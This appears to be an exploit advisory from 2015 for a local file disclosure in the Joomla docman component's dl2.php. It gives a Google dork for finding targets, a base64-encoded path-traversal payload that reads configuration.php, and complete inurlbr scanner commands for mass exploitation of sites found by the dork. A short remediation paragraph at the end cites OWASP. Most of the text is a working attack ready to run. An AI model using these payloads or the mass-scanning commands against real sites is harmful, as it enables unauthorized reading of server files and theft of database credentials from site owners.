Exploring component of Joomla cms
# Joomla docman Component 'com_docman' Full Path Disclosure(FPD) & Local File Disclosure/Include(LFD/LFI)
# CWE: CWE-200(FPD) CWE-98(LFI/LFD)
# Risk: High
# Author: Hugo Santiago dos Santos
# Contact: [email protected]
# Date: 13/07/2015
# Vendor Homepage: http://extensions.joomla.org/extension/directory-a-documentation/downloads/docman
https://www.exploit-db.com/exploits/37620/
There is a get parameter untreated in the application "file=" which enables download files from the server.
Google Dork:
inurl:"/components/com_docman/dl2.php"
POC:
http://www.site.com/components/com_docman/dl2.php?archive=0&file=base64([LDF])
Internment such an application must use the native function of php base64_decode to access your files.
string base64_decode ( string $data [, bool $strict = false ] );
more http://php.net/manual/en/function.base64-decode.php
The application uses crypt 64 then we should do the same to get the server files.
injection string:
../../../../../../../target/www/configuration.php <= Not Ready
encoded string:
Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA== <= Ready !
Example
http://www.site.com/components/com_docman/dl2.php?archive=0&file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA== <= Ready !
Using inurlbr scanner for mass exploitation:
Download script: https://github.com/googleinurl/SCANNER-INURLBR
- Creating our command
SET DORK:
--dork 'inurl:"/components/com_docman/dl2.php"'
SET OUTPUT FILE:
-s dl2.txt
SET EXPLOIT GET
To encode our injection string we use a ineterna function of inurlbr script.
base64 Encrypt values in base64.
Example: base64({value})
Usage: base64(102030)
Usage:
--exploit-get 'user?id=base64(102030)'
URL with inject get:
http://www.target.us/user?id=MTAyMDMw
Use:
--exploit-get '/dl2.php?archive=0&file=base64(../../../../../../../target/www/configuration.php)'
OR USE SITE ENCODER: https://www.base64encode.org/
Use:
--exploit-get '/dl2.php?archive=0&file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA=='
SET FILTER
Filter results in unique domains.
--unique
SET VALIDATION
Valid results based on your return http code.
Example: --ifcode {ifcode}
Usage: --ifcode 200
COMPLETE COMMAND:
php inurlbr.php --dork 'inurl:"/components/com_docman/dl2.php"' -s dl2.txt --exploit-get '/dl2.php?archive=0&file=base64(../../../../../../../target/www/configuration.php)' --unique --ifcode 200
OR
php inurlbr.php --dork 'inurl:"/components/com_docman/dl2.php"' -s dl2.txt --exploit-get '/dl2.php?archive=0&file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA==' --unique --ifcode 200
Remediation:
The most effective solution to eliminate file inclusion vulnerabilities is to avoid passing user-submitted input to any filesystem/framework API. If this is not possible the application can maintain a white list of files, that may be included by the page, and then use an identifier (for example the index number) to access to the selected file. Any request containing an invalid identifier has to be rejected, in this way there is no attack surface for malicious users to manipulate the path.
https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion
https://www.owasp.org/index.php/Full_Path_Disclosure